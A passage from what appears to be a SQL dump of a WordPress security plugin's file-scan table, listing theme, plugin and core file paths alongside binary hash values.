!k�p(�֞Y��m�^äzTe_����','',0,'?'),('T�Kڛ�G�2����!','wp-content/themes/saybusiness/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+2g&��A��uĬb��','���$��Y	��m�}W����utN�����*y�','',0,'?'),('U�����A\\*_aSX(','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A/����v��','CX��%�.�wC���TA6B<�\"w���c�5� l','',0,'?'),('U�\\p{J��O�Q�&','wp-includes/SimplePie/Cache/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('U\"ou?�׽��Δ��','wp-content/themes/weblog/assets/library/html5shiv/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ި஄UPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('U) �P����4ϩA+�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/lint.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','% �\'�������','�p��$�(p;P���T5̛0�Q�=x|�r�a�','',0,'?'),('U.w\n{@���BV��','wp-content/themes/brickyard/functions/fe/library.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','72Mk#�U.U�\0s\0�','�\Zu�`�?���-m>%��F��,�Hv�(�','',0,'?'),('U4-��s\Zj��_��','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_/C�V�z�Y\'�@�.','@b{r�_R�V�cQ�ϓE��N�1���','',0,'?'),('UC&c���-��q��','wp-content/themes/gambit/inc/template-tags.php',0,'�Y�u��n�s����','�Y�u��n�s����','e�2�\Z�\Zj��&S��\"��^*��\\p','',0,'?'),('UI�_����Ym���_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�W��P��2oY','�v�����4\'���w��h�<|Z�4Q8�xǃ5','',0,'?'),('Ue�tA&�R|��\rQV','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�1�`�Uy�+�۟��','�4_�����H1h(�p��A�9u���^�f�B','',0,'?'),('UlW�=��1]���Z�n','wp-content/themes/quicksand/js/lightgallery/img/video-play.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4̜��5͜��6�A�','\Z�k�����0�Ax[�qnהM�y�����K�,l','',0,'?'),('Un��*9��f�\"҈��','wp-content/themes/wp-simple/assets/images/preview/750x500-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.o�*�z��҉�_wD','vE!���!vأ^�F�[�YE	Vh�]�ȇ�','',0,'?'),('U�.��G\0��h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��Dz��겊��T','s�׷my(�[�~��M������N�Ԙ��;i','',0,'?'),('U���+!@��` �b','wp-content/themes/Endolf/bootstrap/bootstrap.min.js',0,'\0H(�[B\r������@�A','\0H(�[B\r������@�A','��=\'~����s8��u�_�[���*>�\n','',0,'?'),('U� $A=�He�|�zȖ(','wp-includes/Requests/SSL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��������','�}I^L�\\95�N�Y���;�?z��aE=�','',0,'?'),('U��\n8ɣɘ,�����x','wp-content/themes/catch-responsive/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�『n�#�@�9|c�K','������*�_��m��S\0�ܡjհx��2���','',0,'?'),('U����R2���],\0b�B','wp-content/themes/saybusiness/template-parts/page-with-left-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̏�HÅm_�NS','�)����]>�h\">(�ք�b�K�Ƀdԥ�T~','',0,'?'),('U�nz�m\ZOEj=��','wp-content/themes/authorize/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�] ���/���Z','I,5�]N��C@�[RN�rw.En�iy]k��','',0,'?'),('U�nɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=&#��Tk��A=�?','�S���	`4�	:�0�U�h���p���s�ń','',0,'?'),('U�~�UO:c#3#W��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	,�	^��R6Մ��l','�&x{�e5��ɔ�|��c��J��\Z���Ȓ','',0,'?'),('U���$i\"u��&��9','wp-includes/images/crystal/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('U�>�$,պ�!ӣ\"Z�0','wp-content/themes/wp-simple/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���ČS���','!z?���\n�TXl�e7q��$���̙P�ƻA','',0,'?'),('U�^�� H�T�7j','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\'���Y�p','�����΃,�\"w�,��L� Rj\0��)M�o�','',0,'?'),('U�yJ�96ڵ��6��','wp-content/themes/catch-flames/inc/panel/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#Z��5�!Ij�\'�\n�I','�*��P#�-��}]!z%�<\0Ʀ(����p�X`�','',0,'?'),('U�^�\nn8ԑ0{�','wp-content/themes/wp-simple/assets/images/hr_dots.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�{-�S�q�z�T��','�xW�\r<݈��V�����J�����\n��3�^�','',0,'?'),('U�	&������X�\0','wp-content/themes/graduate/assets/uploads/no-featured-image-200x200.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�o\'�\0\"Q=��@	','�O�\n+\'1�9]��=�G���t�Ü��&�s�\\�S�','',0,'?'),('U��v*�5��U��&@','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/smarty/smarty.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��λ,�X W�:>',')L_�HIГJ��z8�r�5�r1�����V,�:','',0,'?'),('U�Ͼsp5��}�٣�','wp-content/themes/simpleshift/assets/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^鐐{1P\'�`���K','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('U�\n�6�j���͘�','wp-content/themes/city-store/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M������;Q���.�','�4���J<��l�f�y��\'���!Rr�v�\\%�X','',0,'?'),('U�*�7G�gn5��i���','wp-content/themes/hitmag/inc/kirki/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jמ�^��~p\\t��','�|XC��U�,.���\n����]+M (K�u�c�','',0,'?'),('U���F4�HA�wO�D','wp-content/themes/enigma/core/scripts/css_js.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-pY48�>�O�J�',']�!E��{��Q�\\���]#�^�{.U)��O','',0,'?'),('U�fR�H��;��+�V�','wp-content/themes/event/inc/front-page/our-speaker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�y~�����7�8','�2��Xē�A̘(�虹�r���/��ge䕾�','',0,'?'),('V\n��U`�_�5���8','wp-includes/js/customize-base.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��r�#��j	�','LF�#�53��uu��t�F	�չRk*xs_{E','',0,'?'),('V\n�@�AN��\'��A��Q','wp-content/themes/enigma/js/enigma_theme_script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���O�ܖ[Ϛ��|(','��t�J/z�u�%�v(���W��v��^����','',0,'?'),('VU�L��\Z�izQ','wp-content/themes/newsmag/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EA�*��*JvE��','���͑����R��!��D�t�α�`C\rR��','',0,'?'),('V�G*��Љ�ƙ)��!','wp-content/themes/metro-magazine/images/img18.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���@�\n�Ě�Y7E_',')Ny$V*���x�:ϙ���O*ԁE׍y�gW','',0,'?'),('V���\Z��_�R��','wp-content/themes/twentynineteen/js/priority-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�~&*mB��T@�GI�','D(�Tu}5{������ \0+��5g7`�)�y�','',0,'?'),('VT�xVNw�BX/[�1�','wp-content/themes/quicksand/sidebar-content-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Cu�z�}�\'m','s?��mæ^vE���@����Wb��\n:����','',0,'?'),('V�j�uf;睬��U','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/mode/multiplex.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�� \n�f��P��\Z','Ւ�AG�Fy��#�&�T�X���!�','',0,'?'),('V�\r�3#��J��{','wp-includes/sodium_compat/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��NKp@}���\r�|','���a���<K�-��Ìb=7t�#�-8��/��`','',0,'?'),('V	EF���#��4y','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/matchtags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TQ\'���]w�����uŶ','��`��N	��ն�bxSO �~�9Ͷ\n�B�2','',0,'?'),('V#7A�����@�?���)','wp-content/plugins/wordfence/views/unsupported-php/admin-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(`��HMD��A�7�9','y��I~	@V�Y247�&�U��uމ����','',0,'?'),('V2�L��\0ۺ��','wp-includes/js/jquery/ui/controlgroup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�##�=�F=��\\�v','��>733hE}���z�[)�e�Z0�ߨ!�$/Ӿ�','',0,'?'),('V5#��<H��r��j3d','wp-content/themes/Kent/FT/FT_scope.php',0,'㉃�q�B3v��u.��','㉃�q�B3v��u.��','�h��G+L�&\'AG-G2�n~�H�\rh���','',0,'?'),('V8��8��ߟ\rZ�5','wp-content/themes/twentynineteen/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q��n䄼��a�','�4�x\"�#�4�ϙ��w2�E��7�l�4�1�','',0,'?'),('V<	�l+�bX��HVC�T','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/haml/haml.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wt\'�A�w���','�I)��\\A���Q��q��Ed�o�>��M��','',0,'?'),('V?�O�N���e�ZF\\�','wp-includes/js/jquery/ui/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Z����a��','�\"����!f�~xXW��ۜ��4�Ȗ$:��2/','',0,'?'),('VI����旋�!��','wp-content/themes/catch-flames/js/jquery.cookie.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�Ĕ��N��l�IO5','n+GG�l��.�q��#��b	*>������?','',0,'?'),('VL6�7G^l%D5z3��','wp-includes/default-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�t��<�޸��!�','�^�\'U9�;dOˊSz��!S��m��>I5�\'�e�','',0,'?'),('VS\"9\r0����U�~��','wp-content/themes/the-best/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']�ǘº�WM�,\"��','�Ӣ�7BJ��Pwt������y�(A�n�Px�','',0,'?'),('Vne!�z0u1?��','wp-includes/shortcodes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'9A�C��zaϥ�2','@o��i\r��������}�8�n���#�\Zق','',0,'?'),('Vo�s�2ۣ����&�','wp-content/themes/catch-responsive/js/source/fitvids.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�B�[��s��o��X','�F�9��\r�IA.�QVE�O~M���-��Q�','',0,'?'),('Vrm�KE�p�j��6�','wp-admin/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('Vy��Vږ��	�7','wp-content/themes/wp-simple/inc/kirki/assets/json/webfonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q������:WR��c9','�s]�	W��z���S�K,���\n��N����FQ','',0,'?'),('V�N“�y[�l�8�','wp-content/themes/chronus/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(V\'y:}umz�9 ��','}X�\"b-P�	�a]m���E���ZC���','',0,'?'),('V�����댏$�x','wp-admin/js/post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~=��z�!L\Z�DAl�','�js�O�v�W��Ϗ�Sq��������','',0,'?'),('V����rz�(�nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�T^z[\"��\Zo��','A����_}��Q�\"�gV�UْP��(���6l','',0,'?'),('V׀��\'h��Ĉ+:��','wp-admin/includes/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2n�Ֆ[�uj��7','e�M3V\"�d0����/0o���u�T�k��','',0,'?'),('V�����c��8R�Ћ','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/3024-day.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�vR�����݅��','���ɏ����5��/����)�z�v','',0,'?'),('V���æAl<!w��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/pastel-on-dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EH�+��HU��\\k�','iB墇�.x��IH��T6ח�GU�(��Pt��','',0,'?'),('V�l[���d�rR\Z','wp-content/themes/auberge/library/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��yrk�\n��e��','Ҙ/0_�k:hx�f����1Y�y���1x�0���','',0,'?'),('V���1)�~����O','wp-content/plugins/wp-cerber/assets/wrench.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�3�Cb�C-2!�Q�','�;�����մ��xj�E����%Z�P�c��','',0,'?'),('V��r�_d9�\Zl?�o','wp-content/themes/gambit/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sQ��3�v���8�ӭ�','a�a]�4��)�k�dZB���Կ��y','',0,'?'),('Ws�$8�~��Nȁ-�@','wp-includes/js/mediaelement/mediaelementplayer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),('W\ZBJ�t}�}�&��+','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̭,�\r��2����&�','n��J\Z,8��Y8{\0R��f��m�~���QɹZ','',0,'?'),('Wj��(9�Q�}ჾ0','wp-content/themes/chronus/template-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�y�I8[��,�','��ff�`f]v��0\"�\0������f�|)�','',0,'?'),('W\"䎰[H<Z3�ѓ','wp-content/themes/city-store/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n]�yY�|h���QW���','=�}&fT�|��\'��V�\n}�ha_�����\n','',0,'?'),('W&�ִ �)+�ڱ���','wp-admin/includes/class-plugin-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z1)i(o+���:','�z��d ��&,T`6BeW���S�w3\\��','',0,'?'),('W\'�ь��Zr�\\���','wp-content/themes/graphene/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]k�\"���Dk\">��Q','q5��lB���h������\r�ᴧ�����','',0,'?'),('W0em�\"�?��g�ی�r','wp-content/themes/catch-responsive/inc/catchresponsive-default-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��܏��>5\r��AC�','F��^�c�nb����K�C�	��¾�Gb:','',0,'?'),('W2�-��C<�Q�>d','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/lint/coffeescript-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�\Z�KC	 k�q�ޟ�','c����[\"Wc�c�ł�?��av����','',0,'?'),('W8h�!ɩk�ĉ\'�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�RU�b�*��\0\'�','x����<�s��BZ�2�j��RM\'0%$��i{ V','',0,'?'),('W;1C\\:~��D���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-logged-in-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Kۦ��81yR�','){e���`�v�)?/��;wnh�x�r���%�','',0,'?'),('W?��Q�xyP�-P','wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-framework-admin.php',0,'ފX�qq�&zʭw�','ފX�qq�&zʭw�','��AQ��#F���fScI�m�|80��n�','',0,'?'),('WBy�ɨ��3Aڟ��y\'','wp-content/themes/education-hub/inc/customizer/partials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���R���v�y�G','���m�Q���U6�k6\\\n�.],��];��=O��','',0,'?'),('WK:����|q��\'��','wp-content/themes/exoplanet/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b{f��[��3��D߷','�6W���o���]	/�\Z3���Fc�X^','',0,'?'),('WLL}���{�!b�-','wp-content/themes/quicksand/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r�J\\%�)�̽!�','��H�-�P��S�4�T92�߾���(A��bx�f�','',0,'?'),('Wl[_��-�콞	�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-brute-force-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�\Z�\n�����N�\r�E','h����n�#�M��p�\0j����E��!�D�','',0,'?'),('Ws��{N�hP�r�㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kӞw��\"���M��','z�v�l������!1L���+\0�.�i��kIj','',0,'?'),('Wtt+5-�,H�y�b','wp-content/themes/enigma/images/1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8+���q�s>,�ۂ\'','	Uo�lB���W��R� ����{��,ta�','',0,'?'),('Wx\Z�Ta��7{��','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�|��s,�=�K#�','6���ly�6ɦi��3U���,�E[鲓9��','',0,'?'),('W{�g- X��\'=n8','wp-admin/moderation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�EVU��u�������','��Fq�6��1����<���w�t&�b����1��','',0,'?'),('W})Ӗ7���e�}5�9,','wp-admin/load-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i\r|&�Ĉ3�d!ک9�','{��uo�b��jxa��[S\'K&��S�%\nAi��','',0,'?'),('W�~#H��)�0\n�\\��','wp-content/themes/catch-flames/css/genericons/Genericons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','→��(��7k�j','ɞ����1��X��*��*��y��h���s','',0,'?'),('W��Y+D����y��','wp-content/themes/gambit/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�F�=j�윾\n��g2','l4�\r���}<�H5�qu��)��_�����d�','',0,'?'),('W��LjN/�@Ϣ�ư�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T	��nr�k���','�;\\��Xځ��/0;��Q�P�.�B4��\Z�','',0,'?'),('W�U��?��tl�/W >','wp-content/themes/twentynineteen/style-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a2[��6��g���','��{EolP,qh�O������F�	���Df�','',0,'?'),('W�C��L<݂��y6�','wp-content/themes/enigma/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Et4uD���\r��{|','�������kZP�bs����U��0�A0K@�K','',0,'?'),('W�~锵n]��V��]z','wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/3cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o��i�#�2�:V','߰-t���:�uq�m��\\�VQ���L\'��G[@�%','',0,'?'),('W�z6l@��r���:s','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/lib/codemirror.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���y+<~��q0���`','2I�k��Ӄ�&_��yj>w(�p�I�J[��','',0,'?'),('W�w��\'8��:����W','wp-content/themes/saybusiness/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7֯ڶS�\0`D�Uj','p\nod\ZL������\'tg����$��\"̀�K��','',0,'?'),('W��t�^��9�Yv�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/search/match-highlighter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�䶇-��wmy4','�y��6�l�)^�*%��8�tb�Vz�0mQ1b','',0,'?'),('W�U����W\\�t2��.','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/icecoder.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gو�>\0z����6','�T\ZX��:�†��s�D�\0\'ɝv�J���\nQN','',0,'?'),('W���=�d�Ό.�!�','wp-content/themes/Kent/FT/options/banners.php',0,'_�}ӆ`��\\�K	','_�}ӆ`��\\�K	','�ʺ\r[E�J����CE].Ț\r�{�J=8\"�hL�','',0,'?'),('W��$������T��','wp-content/themes/Kent/page.php',0,'w(�N,|����F0�','w(�N,|����F0�','�Y� �So�5�[�j�S�굷ւ��*�\n�5','',0,'?'),('W�]�\nԉ����Bw!e','wp-content/themes/simpleshift/assets/js/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�9GP� *�A�D(\Z�','#%6�Y;C���\Z�����ER�ijO�F?�}�<','',0,'?'),('W��>6�ec�8�','wp-content/themes/catch-flames/inc/panel/images/arrow-dark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�F�AA��g���','�:�oM�y��DL	A�X)#%|����%�&I��','',0,'?'),('W��5�Ν�>�_`|��','wp-content/plugins/wp-cerber/assets/flags/py.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����UƸ_��`U��','���s�d��-��ǁ&ǂ��v�	&l:��V','',0,'?'),('XB�M;�y���0�1','wp-content/themes/simpleshift/inc/kirki/assets/css/customizer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���y����ޕ�M','��[<9C���Gx�n92�^]�<�a�x�4��\Z�','',0,'?'),('X��\\shv]�iB�','wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݇�(�0,m�G_Y�3','^�)o�B������f�g�*�V�P�?�~��u:','',0,'?'),('X�\Z��Y,�N{�fH','wp-content/themes/authorize/assets/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�����b�iT�3','Q��\r\n�c\"�)�PP��ʂ��|�%0�c�>M','',0,'?'),('X*H��àC���;n�','wp-content/themes/chronus/inc/customizer/sections/customizer-featured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4����`�l~8�~','��ΪW����&�WQ���>D�;<�Շ��8','',0,'?'),('X+ٴ���3��0�1�','wp-content/themes/twentytwentyone/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5qO\'1�nU�X���4','tnjҴ�%.<A���s��݅�,[��(���.�','',0,'?'),('X,�E�Cj$_��8I��0','wp-includes/images/smilies/icon_cool.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��`����ivj.�','�事F�9;2_	�$�$~�LO�a��6���_','',0,'?'),('XA���c_*^��/�^','wp-content/themes/enigma/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��¹z�`<{qnʛ��','T\"z�\\�Z�a��(�mbtʸ�I�\\����o','',0,'?'),('XT��h�H)����6�E','wp-content/themes/quicksand/template-parts/content-quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a��*8~�\\�mt','ʤ\ZXj��ܕw��S����^�Ų��Q��~�V','',0,'?'),('X���$|\"�b�.��R','wp-content/themes/the-best/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xϩx�ߢ��\\�I','~���N0��t)��O��c�b����t','',0,'?'),('X��M����xڳ�J�','wp-includes/Requests/Hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�� ���gx�i���','�՚���� Q�憐D�P��؂_?y�`�����','',0,'?'),('X�:8+˓2>V]��8�','wp-admin/images/sort-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Aìk�:�bтvFj','\'���aK�\0tGJ�Bq��XW*(J|1���z[(','',0,'?'),('X���v�\Zƒ��\"�$','wp-includes/Requests/Exception/HTTP/409.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�i�~*=����','���_M��8U���.pF����w�:E`�MB��','',0,'?'),('X��IkѨ_�6�;C#','wp-content/themes/hitmag/inc/kirki/assets/scss/customizer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ķ.M��zA��As�','��G�@�������jA��i\\c��@��..L','',0,'?'),('X��W���,�Hl','wp-content/themes/wp-simple/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~.k��\rW7��,I�','ʯ�SJ\\�ޟ����R�	��	�oa�0;6','',0,'?'),('X�?M-H?���Al8/','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-acct-activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H|��wcC�6�ʕ','��\nA022?�rק.���jJ5�G��rZ','',0,'?'),('X�s��Yq���ePL','wp-includes/blocks/code/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �2z`������A�%�','W��@\r�8�Q��u�\0H� �WhR��ے0c���','',0,'?'),('X���G������z�X','wp-admin/includes/class-wp-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P=�&��\\��.�_I','��fJ��\n\'-�#?�%�7����{�}\\٤�$�','',0,'?'),('X�~�Vzl!_�]/�-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k(ʫ�ݑ伉����\"','�ڴ��\'��(X�����\"��Ocn,Mq`�D�','',0,'?'),('X�z*��*+�Wl��f','wp-content/themes/wp-simple/inc/kirki/assets/scss/panels/expanded.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6IT���+��8t=','�B�2��锳§�lyk(��G����','',0,'?'),('X�k(D��qț��G��','wp-includes/js/jquery/ui/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�U���Ƥ����','��f,p��`��qR��2�\Z^v�6��`��s�$','',0,'?'),('XѾ��%�4h�B(���','wp-content/themes/skt-pathway/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�V֒���G�9=�','\Z�!��9���]Y��+��L�߮/Nv�_\n<�2�','',0,'?'),('X�=��eշljBj�F�','wp-content/themes/university-hub/inc/customizer/callback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�	����n͔װ]','�OS��~7a;v���`7I�=�7w��?\'�w','',0,'?'),('X�����M ��ޛa�','wp-content/themes/graduate/inc/customizer/sections/about-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���͸2�@U>���^','��$C6�)S��K`:s�����wfӶYN�����z','',0,'?'),('X�=�2h4�/{�+','wp-includes/spl-autoload-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��u�{�t���','��,�Z\rM	>܅��g�p�/�	